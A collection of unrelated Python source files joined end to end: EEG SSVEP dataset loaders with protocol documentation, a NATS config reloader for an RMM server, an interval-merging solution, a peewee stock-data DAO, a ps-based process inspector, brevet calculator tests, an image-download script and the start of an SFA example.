        fsn = fs_get_file_id(filelist)
        gb = pooch.create(path=path, base_url=MAMEM_URL, registry=reg)
        # File names encode the subject number in characters 2-3.
        spath = [gb.fetch(fsn[f]) for f in fsn.keys() if f[2:4] == sub]
        return spath
class MAMEM1(BaseMAMEM):
    """SSVEP MAMEM 1 dataset.

    .. admonition:: Dataset summary

        ====== ======= ======= ========== ================= =============== =============== ===========
        Name    #Subj   #Chan   #Classes   #Trials / class   Trials length   Sampling rate   #Sessions
        ====== ======= ======= ========== ================= =============== =============== ===========
        MAMEM1     10     256          5             12-15              3s           250Hz           1
        ====== ======= ======= ========== ================= =============== =============== ===========

    Dataset from [1]_.

    EEG signals with 256 channels captured from 11 subjects executing a
    SSVEP-based experimental protocol. Five different frequencies
    (6.66, 7.50, 8.57, 10.00 and 12.00 Hz) have been used for the visual
    stimulation, and the EGI 300 Geodesic EEG System, using a
    HydroCel Geodesic Sensor Net (HCGSN) and a sampling rate of
    250 Hz, has been used for capturing the signals.

    Check the technical report [2]_ for more detail.

    From [1]_, subjects were exposed to non-overlapping flickering lights from five
    magenta boxes with frequencies [6.66Hz, 7.5Hz, 8.57Hz 10Hz and 12Hz].
    256 channel EEG recordings were captured.

    Each session of the experimental procedure consisted of the following:

    1. 100 seconds of rest.
    2. An adaptation period in which the subject is exposed to eight
       5 second windows of flickering from a magenta box. Each flickering
       window is of a single isolated frequency, randomly chosen from the
       above set, specified in the FREQUENCIES1.txt file under
       'adaptation'. The individual flickering windows are separated by 5
       seconds of rest.
    3. 30 seconds of rest.
    4. For each of the frequencies from the above set in ascending order,
       also specified in FREQUENCIES1.txt under 'main trials':

       1. Three 5 second windows of flickering at the chosen frequency,
          separated by 5 seconds of rest.
       2. 30 seconds of rest.

    This gives a total of 15 flickering windows, or 23 including the
    adaptation period.

    The order of chosen frequencies is the same for each session, although
    there are small-moderate variations in the actual frequencies of each
    individual window. The .freq annotations list the different frequencies at
    a higher level of precision.

    **Note**: Each 'session' in experiment 1 includes an adaptation period, unlike
    experiment 2 and 3 where each subject undergoes only one adaptation period
    before their first 'session'.

    From [3]_:

    **Eligible signals**: The EEG signal is sensitive to external factors that have
    to do with the environment or the configuration of the acquisition setup.
    The research staff was responsible for the elimination of trials that were
    considered faulty. As a result the following sessions were noted and
    excluded from further analysis:

    1. S003, during session 4 the stimulation program crashed
    2. S004, during session 2 the stimulation program crashed, and
    3. S008, during session 4 the Stim Tracker was detuned.

    Furthermore, we must also note that subject S001 participated in 3 sessions
    and subjects S003 and S004 participated in 4 sessions, compared to all
    other subjects that participated in 5 sessions (NB: in fact, there is only
    3 sessions for subjects 1, 3 and 8, and 4 sessions for subject 4 available
    to download). As a result, the utilized dataset consists of 1104 trials of
    5 seconds each.

    **Flickering frequencies**: Usually the refresh rate for an LCD Screen is 60 Hz
    creating a restriction to the number of frequencies that can be selected.
    Specifically, only the frequencies that when divided with the refresh rate
    of the screen result in an integer quotient could be selected. As a result,
    the frequencies that could be obtained were the following: 30.00, 20.00,
    15.00, 12.00, 10.00, 8.57, 7.50 and 6.66 Hz. In addition, it is also
    important to avoid using frequencies that are multiples of another
    frequency, for example making the choice to use 10.00Hz prohibits the use
    of 20.00 and 30.00 Hz. With the previously described limitations in mind,
    the selected frequencies for the experiment were: 12.00, 10.00, 8.57, 7.50
    and 6.66 Hz.

    **Stimuli Layout**: In an effort to keep the experimental process as simple as
    possible, we used only one flickering box instead of more common choices,
    such as 4 or 5 boxes flickering simultaneously. The fact that the subject
    could focus on one stimulus without having the distraction of other
    flickering sources allowed us to minimize the noise of our signals and
    verify the appropriateness of our acquisition setup. Nevertheless, having
    concluded the optimal configuration for analyzing the EEG signals, the
    experiment will be repeated with more concurrent visual stimulus.

    **Trial duration**: The duration of each trial was set to 5 seconds, as this
    time was considered adequate to allow the occipital part of the brain to
    mimic the stimulation frequency and still be small enough for making a
    selection in the context.

    References
    ----------
    .. [1] MAMEM Steady State Visually Evoked Potential EEG Database
           `<https://archive.physionet.org/physiobank/database/mssvepdb/>`_
    .. [2] V.P. Oikonomou et al, 2016, Comparative evaluation of state-of-the-art
           algorithms for SSVEP-based BCIs. arXiv.
           `<http://arxiv.org/abs/1602.00904>`_
    .. [3] S. Nikolopoulos, 2016, DataAcquisitionDetails.pdf
           `<https://figshare.com/articles/dataset/MAMEM_EEG_SSVEP_Dataset_I_256_channels_11_subjects_5_frequencies_/2068677?file=3793738>`_ # noqa: E501
    """

    def __init__(self):
        super().__init__(
            events={"6.66": 1, "7.50": 2, "8.57": 3, "10.00": 4, "12.00": 5},
            sessions_per_subject=1,
            # 5 runs per sessions, except 3 for S001, S003, S008, 4 for S004
            code="MAMEM1",
            doi="https://arxiv.org/abs/1602.00904",
            figshare_id=2068677,
        )
class MAMEM2(BaseMAMEM):
    """SSVEP MAMEM 2 dataset.

    .. admonition:: Dataset summary

        ====== ======= ======= ========== ================= =============== =============== ===========
        Name    #Subj   #Chan   #Classes   #Trials / class   Trials length   Sampling rate   #Sessions
        ====== ======= ======= ========== ================= =============== =============== ===========
        MAMEM2     10     256          5             20-30              3s           250Hz           1
        ====== ======= ======= ========== ================= =============== =============== ===========

    Dataset from [1]_.

    EEG signals with 256 channels captured from 11 subjects executing a
    SSVEP-based experimental protocol. Five different frequencies
    (6.66, 7.50, 8.57, 10.00 and 12.00 Hz) have been used for the visual
    stimulation, and the EGI 300 Geodesic EEG System, using a
    HydroCel Geodesic Sensor Net (HCGSN) and a sampling rate of
    250 Hz, has been used for capturing the signals.

    Subjects were exposed to flickering lights from five violet boxes with
    frequencies [6.66Hz, 7.5Hz, 8.57Hz, 10Hz, and 12Hz] simultaneously. Prior
    to and during each flickering window, one of the boxes is marked by a yellow
    arrow indicating the box to be focused on by the subject. 256 channel EEG
    recordings were captured.

    From [2]_, each subject underwent a single adaptation period before the first of
    their 5 sessions (unlike experiment 1 in which each session began with its own
    adaptation period). In the adaptation period, the subject is exposed to ten
    5-second flickering windows from the five boxes simultaneously, with the
    target frequencies specified in the FREQUENCIES2.txt file under
    'adaptation'. The flickering windows are separated by 5 seconds of rest,
    and the 100s adaptation period precedes the first session by 30 seconds.

    Each session consisted of the following:

    For the series of frequencies specified in the FREQUENCIES2.txt file under
    'sessions':

    A 5 second window with all boxes flickering and the subject focusing
    on the specified frequency's marked box, followed by 5 seconds of rest.
    This gives a total of 25 flickering windows for each session (not
    including the first adaptation period). Five minutes of rest before
    the next session (not including the 5th session).

    The order of chosen frequencies is the same for each session, although
    there are small-moderate variations in the actual frequencies of each
    individual window.

    **Note**: Each 'session' in experiment 1 includes an adaptation period,
    unlike experiment 2 and 3 where each subject undergoes only one adaptation
    period before their first 'session'.

    **Waveforms and Annotations**

    File names are in the form T0NNn, where NN is the subject number and n is
    a - e for the session letter or x for the adaptation period. Each session
    lasts in the order of several minutes and is sampled at 250Hz. Each session
    and adaptation period has the following files:

    A waveform file of the EEG signals (.dat) along with its header file
    (.hea). If the channel corresponds to an international 10-20 channel then
    it is labeled as such. Otherwise, it is just labeled 'EEG'. An annotation
    file (.flash) containing the locations of each individual flash. An
    annotation file (.win) containing the locations of the beginning and end
    of each 5 second flickering window. The annotations are labeled as '(' for
    start and ')' for stop, along with auxiliary strings indicating the focal
    frequency of the flashing windows.

    The FREQUENCIES2.txt file indicates the approximate marked frequencies of
    the flickering windows, equal for each session, adaptation, and subject.
    These values are equal to those contained in the .win annotations.

    **Observed artifacts:**

    During the stimulus presentation to subject S007 the research staff
    noted that the subject had a tendency to eye blink. As a result the
    interference, in matters of artifacts, on the recorded signal is expected
    to be high.

    References
    ----------
    .. [1] MAMEM Steady State Visually Evoked Potential EEG Database
           `<https://archive.physionet.org/physiobank/database/mssvepdb/>`_
    .. [2] S. Nikolopoulos, 2016, DataAcquisitionDetails.pdf
           `<https://figshare.com/articles/dataset/MAMEM_EEG_SSVEP_Dataset_II_256_channels_11_subjects_5_frequencies_presented_simultaneously_/3153409?file=4911931>`_ # noqa: E501
    """

    def __init__(self):
        super().__init__(
            events={"6.66": 1, "7.50": 2, "8.57": 3, "10.00": 4, "12.00": 5},
            sessions_per_subject=1,
            code="MAMEM2",
            doi="https://arxiv.org/abs/1602.00904",
            figshare_id=3153409,
        )
class MAMEM3(BaseMAMEM):
    """SSVEP MAMEM 3 dataset.

    .. admonition:: Dataset summary

        ====== ======= ======= ========== ================= =============== =============== ===========
        Name    #Subj   #Chan   #Classes   #Trials / class   Trials length   Sampling rate   #Sessions
        ====== ======= ======= ========== ================= =============== =============== ===========
        MAMEM3     10      14          4             20-30              3s           128Hz           1
        ====== ======= ======= ========== ================= =============== =============== ===========

    Dataset from [1]_.

    EEG signals with 14 channels captured from 11 subjects executing a
    SSVEP-based experimental protocol. Five different frequencies
    (6.66, 7.50, 8.57, 10.00 and 12.00 Hz) have been used for the visual
    stimulation, and the Emotiv EPOC, using 14 wireless channels has been used
    for capturing the signals.

    Subjects were exposed to flickering lights from five magenta boxes with
    frequencies [6.66Hz, 7.5Hz, 8.57Hz, 10Hz and 12Hz] simultaneously. Prior
    to and during each flickering window, one of the boxes is marked by a yellow
    arrow indicating the box to be focused on by the subject. The Emotiv EPOC
    14 channel wireless EEG headset was used to capture the subjects' signals.

    Each subject underwent a single adaptation period before the first of their
    5 sessions (unlike experiment 1 in which each session began with its own
    adaptation period). In the adaptation period, the subject is exposed to ten
    5-second flickering windows from the five boxes simultaneously, with the
    target frequencies specified in the FREQUENCIES3.txt file under
    'adaptation'. The flickering windows are separated by 5 seconds of rest,
    and the 100s adaptation period precedes the first session by 30 seconds.

    Each session consisted of the following:

    For the series of frequencies specified in the FREQUENCIES3.txt file under
    'sessions':

    A 5 second window with all boxes flickering and the subject focusing on
    the specified frequency's marked box, followed by 5 seconds of rest.
    Between the 12th and 13th flickering window, there is a 30s resting
    period. This gives a total of 25 flickering windows for each session
    (not including the first adaptation period). Five minutes of rest
    before the next session (not including the 5th session).

    The order of chosen frequencies is the same for each session, although
    there are small-moderate variations in the actual frequencies of each
    individual window.

    **Note**: Each 'session' in experiment 1 includes an adaptation period, unlike
    experiment 2 and 3 where each subject undergoes only one adaptation period
    before their first 'session' [2]_.

    **Waveforms and Annotations**

    File names are in the form U0NNn, where NN is the subject number and n is
    a - e for the session letter or x for the adaptation period. In addition,
    session file names end with either i or ii, corresponding to the first 12
    or second 13 windows of the session respectively. Each session lasts in the
    order of several minutes and is sampled at 128Hz.

    Each session half and adaptation period has the following files:

    A waveform file of the EEG signals (.dat) along with its header file
    (.hea). An annotation file (.win) containing the locations of the beginning
    and end of each 5 second flickering window. The annotations are labeled as
    '(' for start and ')' for stop, along with auxiliary strings indicating the
    focal frequency of the flashing windows.

    The FREQUENCIES3.txt file indicates the approximate marked frequencies of
    the flickering windows, equal for each session, adaptation, and subject.
    These values are equal to those contained in the .win annotations.

    **Trial manipulation**:

    The trial initiation is defined by an event code (32779) and the
    end by another (32780). There are five different labels that indicate the
    box subjects were instructed to focus on (1, 2, 3, 4 and 5) and
    correspond to frequencies 12.00, 10.00, 8.57, 7.50 and 6.66 Hz respectively.

    5 3 2 1 4 5 2 1 4 3 is the trial sequence for the adaptation and
    4 2 3 5 1 2 5 4 2 3 1 5 4 3 2 4 1 2 5 3 4 1 3 1 3 is the sequence for each
    session.

    **Observed artifacts**:

    During the stimulus presentation to subject S007 the research staff
    noted that the subject had a tendency to eye blink. As a result the
    interference, in matters of artifacts, on the recorded signal is expected
    to be high.

    References
    ----------
    .. [1] MAMEM Steady State Visually Evoked Potential EEG Database
           `<https://archive.physionet.org/physiobank/database/mssvepdb/>`_
    .. [2] S. Nikolopoulos, 2016, DataAcquisitionDetails.pdf
           `<https://figshare.com/articles/dataset/MAMEM_EEG_SSVEP_Dataset_III_14_channels_11_subjects_5_frequencies_presented_simultaneously_/3413851>`_ # noqa: E501
    """

    def __init__(self):
        super().__init__(
            events={
                "6.66": 33029,
                "7.50": 33028,
                "8.57": 33027,
                "10.00": 33026,
                "12.00": 33025,
            },
            sessions_per_subject=1,
            code="MAMEM3",
            doi="https://arxiv.org/abs/1602.00904",
            figshare_id=3413851,
        )
|
import json
import os
import subprocess
from loguru import logger
from django.conf import settings
from rest_framework import status
from rest_framework.response import Response
from agents.models import Agent
logger.configure(**settings.LOG_CONFIG)


def notify_error(msg):
    """Return a 400 Bad Request response carrying ``msg`` as its body."""
    # PEP 8: a named def is preferred over assigning a lambda to a name.
    return Response(msg, status=status.HTTP_400_BAD_REQUEST)
def reload_nats():
    """Regenerate the NATS config with per-agent credentials and reload it.

    Writes ``nats-rmm.conf`` next to the Django project and signals the
    running nats-server to reload (outside Docker builds).
    """
    users = [{"user": "tacticalrmm", "password": settings.SECRET_KEY}]
    agents = Agent.objects.prefetch_related("user").only("pk", "agent_id")
    for agent in agents:
        try:
            users.append(
                {"user": agent.agent_id, "password": agent.user.auth_token.key}
            )
        except Exception:
            # BUGFIX: the original bare `except:` also swallowed
            # SystemExit/KeyboardInterrupt; keep the best-effort skip but
            # only for ordinary exceptions (e.g. missing related user).
            logger.critical(
                f"{agent.hostname} does not have a user account, NATS will not work"
            )
    if not settings.DOCKER_BUILD:
        # e.g. "rmm.example.com" -> "example.com" for the LE cert dir.
        domain = settings.ALLOWED_HOSTS[0].split(".", 1)[1]
        cert_path = f"/etc/letsencrypt/live/{domain}"
    else:
        cert_path = "/opt/tactical/certs"
    config = {
        "tls": {
            "cert_file": f"{cert_path}/fullchain.pem",
            "key_file": f"{cert_path}/privkey.pem",
        },
        "authorization": {"users": users},
        "max_payload": 2048576005,
    }
    conf = os.path.join(settings.BASE_DIR, "nats-rmm.conf")
    with open(conf, "w") as f:
        json.dump(config, f)
    if not settings.DOCKER_BUILD:
        # Ask the running nats-server process to re-read its config.
        subprocess.run(
            ["/usr/local/bin/nats-server", "-signal", "reload"], capture_output=True
        )
|
from operator import itemgetter
class Solution:
    """LeetCode 56 — Merge Intervals."""

    def merge(self, intervals: "List[List[int]]") -> "List[List[int]]":
        """Merge all overlapping intervals and return the merged list.

        Sorts by start (in place, as before), then sweeps once: each
        interval either extends the last merged interval or starts a new
        one. Touching intervals (end == next start) are merged, matching
        the original ``iend >= start`` rule.

        Fixes: the original annotated with ``List`` without importing it
        from ``typing`` (NameError at definition time) — quoting the
        annotations makes them lazy. Also replaces the O(n*k) dict-key
        scan per interval with the standard O(n) sweep after sorting.
        """
        intervals.sort(key=itemgetter(0))
        merged: "List[List[int]]" = []
        for start, end in intervals:
            if merged and start <= merged[-1][1]:
                # Overlaps (or touches) the previous interval: extend it.
                merged[-1][1] = max(merged[-1][1], end)
            else:
                merged.append([start, end])
        return merged
|
from peewee import *
from typing import List
from datetime import date
from dynaconf import settings
from investagram_data_loader.logger import logging
from investagram_data_loader.repository.base_dao import BaseDao
class Stock(Model):
    """Peewee model mirroring Investagram's stock master data."""

    stock_id = IntegerField(primary_key=True)
    stock_code = CharField(max_length=20, index=True)
    stock_name = CharField()
    exchange_type = CharField()
    exchange_string = CharField()
    stock_code_and_exchange = CharField()
    sector_string = CharField()
    subsector_string = CharField()
    is_active = BooleanField()
    stock_type = IntegerField()
    stock_category = CharField()
    stock_category_id = IntegerField()
class Broker(Model):
    """Peewee model for a stock broker as reported by the Investagram API."""

    # Stored in the 'broker_id' column; Transaction joins on this field.
    stock_broker_id = IntegerField(primary_key=True, db_column='broker_id')
    exchange_type = IntegerField()
    broker_name = CharField()
    broker_classification = IntegerField()
    broker_status = IntegerField()
    broker_code = CharField(index=True)
    broker_number = IntegerField()
    broker_status_name = CharField()
    broker_classification_name = CharField()
class Transaction(Model):
    """Daily per-broker, per-stock trading summary record."""

    stock_id = ForeignKeyField(Stock, db_column='stock_id')
    broker_id = ForeignKeyField(Broker, to_field='stock_broker_id', db_column='broker_id')
    # Denormalized copies of the related names for query convenience.
    stock_code = CharField()
    stock_name = CharField()
    broker_code = CharField()
    date = DateField(index=True)
    buy_volume = IntegerField()
    buy_value = FloatField()
    buy_ave_price = FloatField()
    buy_market_val_percent = FloatField()
    buy_trade_count = IntegerField()
    sell_volume = IntegerField()
    sell_value = FloatField()
    sell_ave_price = FloatField()
    sell_market_val_percent = FloatField()
    sell_trade_count = IntegerField()
    net_volume = IntegerField()
    net_value = FloatField()
    total_volume = IntegerField()
    # NOTE(review): total_value is an IntegerField while every other
    # *_value column is a FloatField — confirm the truncation is intended.
    total_value = IntegerField()
# singleton instance
class SqliteDao(BaseDao):
    """Singleton data-access object backed by a SQLite database.

    Fix: although ``__new__`` caches a single instance, Python still runs
    ``__init__`` on *every* ``SqliteDao()`` call, so each call rebuilt the
    ``SqliteDatabase`` handle and re-ran setup. A guard now makes
    initialisation run exactly once.
    """

    models = [Stock, Broker, Transaction]
    _instance = None

    def __new__(cls, *args, **kwargs):
        # Classic singleton: reuse one shared instance per process.
        if cls._instance is None:
            cls._instance = object.__new__(cls)
        return cls._instance

    def __init__(self):
        if getattr(self, "_initialized", False):
            return
        self._database = SqliteDatabase(settings.DATABASE_FILE)
        self._set_db_on_models()
        self._setup()
        self._initialized = True

    def _setup(self):
        """Open the connection (idempotent) and create missing tables."""
        self._database.connect(reuse_if_open=True)
        self._database.create_tables(SqliteDao.models)

    def _set_db_on_models(self):
        """Bind all managed models to this DAO's database handle."""
        for model in SqliteDao.models:
            model._meta.database = self._database

    def insert_stock(self, data: Stock) -> int:
        """Persist a Stock row; returns the number of rows written."""
        num_inserted = data.save()
        logging.info(f'Inserted {num_inserted} records into stock table.')
        return num_inserted

    def insert_broker(self, data: Broker) -> int:
        """Persist a Broker row; returns the number of rows written."""
        num_inserted = data.save()
        logging.info(f'Inserted {num_inserted} records into broker table.')
        return num_inserted

    def bulk_insert_transactions(self, transactions: List[Transaction]):
        """Insert many transactions atomically, in batches of 25."""
        with self._database.atomic():
            Transaction.bulk_create(transactions, batch_size=25)
        logging.info(f'Inserted {len(transactions)} transaction records in the database.')

    def get_transactions_by_stock_code(self, stock_code: str, from_date: date, to_date: date):
        """Return a lazy query over transactions for a stock within a date range (inclusive)."""
        filters = [
            Transaction.stock_code == stock_code,
            Transaction.date >= from_date,
            Transaction.date <= to_date
        ]
        iterator = Transaction.select().where(*filters)
        return iterator

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        logging.info("Closing the database handle...")
        self._database.close()
def upsert_stock(stock_getter):
    """Decorator caching stock lookups in SQLite.

    Wraps a method that fetches stock info from the API: when the stock
    code already exists locally the cached row is returned, otherwise the
    API is queried and the result persisted.

    Fixes: uses ``functools.wraps`` so the wrapped method keeps its
    name/docstring, and instantiates the DAO lazily so merely importing
    (or decorating) no longer opens a database connection.
    """
    from functools import wraps

    @wraps(stock_getter)
    def wrapper(_self, stock_code: str):
        try:
            logging.info(f"Retrieving {stock_code} stock data from database..")
            entry = Stock.get(Stock.stock_code == stock_code)
            return entry
        except DoesNotExist:
            logging.info(f'{stock_code} data not found in database, querying the api...')
            stock_info = stock_getter(_self, stock_code)
            # SqliteDao is a singleton, so this is cheap after first use.
            SqliteDao().insert_stock(stock_info)
            return stock_info
    return wrapper
def upsert_broker(broker_getter):
    """Decorator caching broker lookups in SQLite.

    Mirror of ``upsert_stock`` for brokers: return the cached Broker row
    when present, otherwise call through to the API and persist the
    result.

    Fixes: adds ``functools.wraps`` and defers DAO construction to call
    time instead of decoration time (no DB side effect on import).
    """
    from functools import wraps

    @wraps(broker_getter)
    def wrapper(_self, broker_code: str):
        try:
            logging.info(f"Retrieving {broker_code} broker data from database..")
            entry = Broker.get(Broker.broker_code == broker_code)
            return entry
        except DoesNotExist:
            logging.info(f'{broker_code} data not found in database, querying the api...')
            broker_info = broker_getter(_self, broker_code)
            # SqliteDao is a singleton, so this is cheap after first use.
            SqliteDao().insert_broker(broker_info)
            return broker_info
    return wrapper
|
import os
import subprocess
from process_handle import ProcessHandle, ProcessHandleParserBase
class ProcessHandlersPs(object):
    """Converters that turn raw `ps` column strings into numeric values."""

    @staticmethod
    def handle_mem(_, value):
        """Convert a memory figure reported in KiB into bytes."""
        return value * 1024

    @staticmethod
    def handle_elapsed(_, value):
        """Parse a ps time of the form [[dd-]hh:]mm:ss[.ds] into seconds."""
        total = 0.0
        days, dash, clock = value.partition('-')
        if dash:
            # A leading "dd-" component was present.
            total += int(days) * 86400
        else:
            clock = value
        # Walk the colon-separated fields right-to-left: seconds, minutes,
        # hours — each field worth 60x the previous one.
        weight = 1.0
        for field in reversed(clock.split(':')):
            total += float(field) * weight
            weight *= 60
        return total
class ProcessHandlePs(ProcessHandle, ProcessHandleParserBase):
    """Process information backend built on the `ps` command-line tool.

    Fetches one formatted ``ps -p <pid> -o ...`` line per query and relies
    on the scanf-style TYPE_MAP of ProcessHandleParserBase plus the
    HANDLERS table to convert columns into numeric values.
    """

    # Columns requested from ps, in output order.
    ATTRS = [ 'user', 'pid', 'ppid', 'pcpu', 'rss', 'vsz', 'stat', 'etime', 'time', 'comm' ]
    # scanf-style conversion spec for each column (consumed by the parser base).
    TYPE_MAP = {
        'user': '%s', 'pid': '%d', 'ppid': '%d', 'pcpu': '%f', 'rss': '%d', 'vsz': '%d', 'stat': '%s',
        'etime': '%s', 'time': '%s', 'comm': '%s'
    }
    # Post-processing: memory columns arrive in KiB; times as [[dd-]hh:]mm:ss.
    HANDLERS = {
        'rss': ProcessHandlersPs.handle_mem,
        'vsz': ProcessHandlersPs.handle_mem,
        'etime': ProcessHandlersPs.handle_elapsed, # [[dd-]hh:]mm:ss.ds
        'time': ProcessHandlersPs.handle_elapsed, # [[dd-]hh:]mm:ss.ds
    }
    ALIASES = {
        'starttime': 'etime',
    }

    def _get_process_attrs(self, attrs):
        # Return the last line of ps output (the data row), or None when
        # the process is gone / ps produced no data row.
        # NOTE(review): the bare except also hides programming errors;
        # narrowing to OSError would be safer — confirm before changing.
        try:
            data = os.popen('ps -p %s -o %s' % (self._pid, ','.join(attrs))).readlines()
            if len(data) > 1:
                return data[-1]
        except:
            return None

    def _produce(self):
        # Hook for the parser base: fetch the raw ps line for all columns.
        return self._get_process_attrs(ProcessHandlePs.ATTRS)

    def cpu_time(self):
        # CPU seconds consumed (parsed 'time' column); 0.0 when unavailable.
        return self.get('time') or 0.0

    def wall_time(self):
        # Elapsed wall-clock seconds since start ('starttime' -> 'etime').
        return self.get('starttime') or 0.0

    def pid(self):
        return self.get('pid')

    def ppid(self):
        return self.get('ppid')

    def user(self):
        return self.get('user')

    def cwd(self):
        # Ask lsof for the working directory; the 'n'-prefixed output line
        # carries the path.
        # NOTE(review): on Python 3 communicate() returns bytes, so the
        # split('\n')/startswith('n') below assume Python 2 str output —
        # confirm the target interpreter before porting.
        try:
            lsof = subprocess.Popen(('lsof -a -p %s -d cwd -Fn' % self.pid()).split(),
                                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            stdout, _ = lsof.communicate()
            for line in stdout.split('\n'):
                if line.startswith('n'):
                    return line[1:]
        except OSError:
            return None

    def cmdline(self):
        # 'comm' is just the base cmd, this returns the cmd with all the arguments.
        # We don't read 'command' on the initial ps call, because the result contains spaces, and
        # our scanf-like parsing code won't read it. This isn't a performance issue in current usage.
        return self._get_process_attrs(['command']).strip()
|
import unittest
import calculate
def run_test(control_dist):
    """Run calculate.calc for a control distance and format the results.

    Returns -1 when calc reports an invalid distance, otherwise a
    [start, finish] pair formatted as "MM.DD.YYYY HH:mm".
    """
    result = calculate.calc(control_dist)
    if result == -1:
        return -1
    fmt = "MM.DD.YYYY HH:mm"
    return [result[0].format(fmt), result[1].format(fmt)]
class TestBrevetCalculator(unittest.TestCase):
    """Unit tests for the ACP brevet control-time calculator (calculate.py).

    The opening/closing tests check the plain formulas; the per-brevet
    tests set ``calculate.brevet`` and verify the special-case rules at
    the boundaries (controls at 0, just below/at/above the brevet length,
    and past the 10%/20% overshoot limit, which must return -1).
    """

    ## This tests the opening_times function, without special cases
    def test_opening_times(self):
        self.assertEqual(calculate.get_opening_time(0), '00:00')
        self.assertEqual(calculate.get_opening_time(1), '00:02')
        self.assertEqual(calculate.get_opening_time(200), '05:53')
        self.assertEqual(calculate.get_opening_time(400), '12:08')
        self.assertEqual(calculate.get_opening_time(599), '18:46')
        self.assertEqual(calculate.get_opening_time(600), '18:48')
        self.assertEqual(calculate.get_opening_time(601), '18:50')
        self.assertEqual(calculate.get_opening_time(999), '33:03')
        self.assertEqual(calculate.get_opening_time(1000), '33:05')

    ## This tests the closing_times function, without special cases
    def test_closing_times(self):
        self.assertEqual(calculate.get_closing_time(0), '01:00')
        self.assertEqual(calculate.get_closing_time(1), '00:04')
        self.assertEqual(calculate.get_closing_time(200), '13:20')
        self.assertEqual(calculate.get_closing_time(400), '26:40')
        self.assertEqual(calculate.get_closing_time(599), '39:56')
        self.assertEqual(calculate.get_closing_time(600), '40:00')
        self.assertEqual(calculate.get_closing_time(601), '40:05')
        self.assertEqual(calculate.get_closing_time(999), '74:55')
        self.assertEqual(calculate.get_closing_time(1000), '75:00')

    ####
    # The following tests are verifying the calc function in calculate.py with
    # special cases
    ####
    def test_brevet_200(self):
        calculate.brevet = 200
        times = run_test(0)
        self.assertEqual(times[0], "01.01.2000 00:00")
        self.assertEqual(times[1], "01.01.2000 01:00")
        times = run_test(1)
        self.assertEqual(times[0], "01.01.2000 00:02")
        self.assertEqual(times[1], "01.01.2000 00:04")
        times = run_test(199)
        self.assertEqual(times[0], "01.01.2000 05:51")
        self.assertEqual(times[1], "01.01.2000 13:16")
        times = run_test(200)
        self.assertEqual(times[0], "01.01.2000 05:53")
        self.assertEqual(times[1], "01.01.2000 13:30")
        times = run_test(201)
        self.assertEqual(times[0], "01.01.2000 05:53")
        self.assertEqual(times[1], "01.01.2000 13:30")
        # Beyond the allowed overshoot: calc must reject the control.
        times = run_test(221)
        self.assertEqual(times, -1)

    def test_brevet_300(self):
        calculate.brevet = 300
        times = run_test(200)
        self.assertEqual(times[0], "01.01.2000 05:53")
        self.assertEqual(times[1], "01.01.2000 13:20")
        times = run_test(299)
        self.assertEqual(times[0], "01.01.2000 08:59")
        self.assertEqual(times[1], "01.01.2000 19:56")
        times = run_test(300)
        self.assertEqual(times[0], "01.01.2000 09:00")
        self.assertEqual(times[1], "01.01.2000 20:00")
        times = run_test(301)
        self.assertEqual(times[0], "01.01.2000 09:00")
        self.assertEqual(times[1], "01.01.2000 20:00")
        times = run_test(331)
        self.assertEqual(times, -1)

    def test_brevet_400(self):
        calculate.brevet = 400
        times = run_test(300)
        self.assertEqual(times[0], "01.01.2000 09:00")
        self.assertEqual(times[1], "01.01.2000 20:00")
        times = run_test(399)
        self.assertEqual(times[0], "01.01.2000 12:06")
        self.assertEqual(times[1], "01.02.2000 02:36")
        times = run_test(400)
        self.assertEqual(times[0], "01.01.2000 12:08")
        self.assertEqual(times[1], "01.02.2000 03:00")
        times = run_test(440)
        self.assertEqual(times[0], "01.01.2000 12:08")
        self.assertEqual(times[1], "01.02.2000 03:00")
        times = run_test(441)
        self.assertEqual(times, -1)

    def test_brevet_600(self):
        calculate.brevet = 600
        times = run_test(400)
        self.assertEqual(times[0], "01.01.2000 12:08")
        self.assertEqual(times[1], "01.02.2000 02:40")
        times = run_test(599)
        self.assertEqual(times[0], "01.01.2000 18:46")
        self.assertEqual(times[1], "01.02.2000 15:56")
        times = run_test(600)
        self.assertEqual(times[0], "01.01.2000 18:48")
        self.assertEqual(times[1], "01.02.2000 16:00")
        times = run_test(660)
        self.assertEqual(times[0], "01.01.2000 18:48")
        self.assertEqual(times[1], "01.02.2000 16:00")
        times = run_test(661)
        self.assertEqual(times, -1)

    def test_brevet_1000(self):
        calculate.brevet = 1000
        times = run_test(600)
        self.assertEqual(times[0], "01.01.2000 18:48")
        self.assertEqual(times[1], "01.02.2000 16:00")
        times = run_test(999)
        self.assertEqual(times[0], "01.02.2000 09:03")
        self.assertEqual(times[1], "01.04.2000 02:55")
        times = run_test(1000)
        self.assertEqual(times[0], "01.02.2000 09:05")
        self.assertEqual(times[1], "01.04.2000 03:00")
        times = run_test(1100)
        self.assertEqual(times[0], "01.02.2000 09:05")
        self.assertEqual(times[1], "01.04.2000 03:00")
        times = run_test(1101)
        self.assertEqual(times, -1)
if __name__ == '__main__':
    # Run the whole suite when executed as a script.
    unittest.main()
|
#一:使用Python中的urllib类中的urlretrieve()函数,直接从网上下载资源到本地
import os, stat
import urllib.request
img_url = "http://img1.bdstatic.com/img/image/shitu/feimg/uploading.gif"
file_path = 'D:/book/img'
file_name = "233"
try:
    # Create the target directory if it does not exist yet.
    if not os.path.exists(file_path):
        os.makedirs(file_path)
    # Derive the image extension from the URL (e.g. ".gif").
    file_suffix = os.path.splitext(img_url)[1]
    print(file_suffix)
    # Build the full destination path (directory + separator + name + extension).
    filename = '{}{}{}{}'.format(file_path, os.sep, file_name, file_suffix)
    print(filename)
    # Download the image and store it in the target folder.
    urllib.request.urlretrieve(img_url, filename=filename)
except IOError as e:
    # Fix: include the exception detail — the original printed only a
    # bare label, discarding the captured error entirely.
    print("IOError", e)
except Exception as e:
    print("Exception", e)
#二:利用读写操作写入文件
"""
import os,stat
import urllib.request
for i in range(1,3):
if not os.path.exists("./rym"):
print("不存在")
os.makedirs("./rym")
else:
print("存在")
os.chmod("D:/imagss",777)
with urllib.request.urlopen("https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1516371301&di=d99af0828b"
"b301fea27c2149a7070d44&imgtype=jpg&er=1&src=http%3A%2F%2Fupload.qianhuaweb.com%2F2017%2F0718%"
"2F1500369506683.jpg", timeout=30) as response, open("./rym/lyj.png"
, 'wb') as f_save:
f_save.write(response.read())
f_save.flush()
f_save.close()
print("成功")
"""
|
"""
============
Moving Digit (Experimental - Hierarchical SFA)
============
An example of :class:`sksfa.HSFA` applied to a simple image time-series:
